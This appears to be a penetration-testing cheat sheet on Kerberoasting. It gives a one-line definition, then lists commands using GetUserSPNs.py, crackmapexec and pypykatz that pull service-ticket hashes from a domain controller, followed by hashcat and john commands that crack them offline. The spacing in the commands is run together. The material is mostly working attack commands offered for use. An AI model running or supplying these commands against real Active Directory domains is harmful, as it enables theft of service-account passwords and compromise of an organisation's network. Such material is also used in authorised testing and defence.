When a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting.
Linux
# with a passwordGetUserSPNs.py-outputfilekerberoastables.txt-dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'# with an NT hashGetUserSPNs.py-outputfilekerberoastables.txt-hashes'LMhash:NThash'-dc-ip $KeyDistributionCenter 'DOMAIN/USER'crackmapexecldap $TARGETS -u $USER -p $PASSWORD --kerberoastingkerberoastables.txt--kdcHost $KeyDistributionCenterpypykatzkerberosspnroast-d $DOMAIN -t $TARGET_USER -e23'kerberos+password://DOMAIN\username:Password@IP'# Decrypt the hashhashcat-m13100kerberoastables.txt $wordlistjohn--format=krb5tgs--wordlist=$wordlistkerberoastables.txt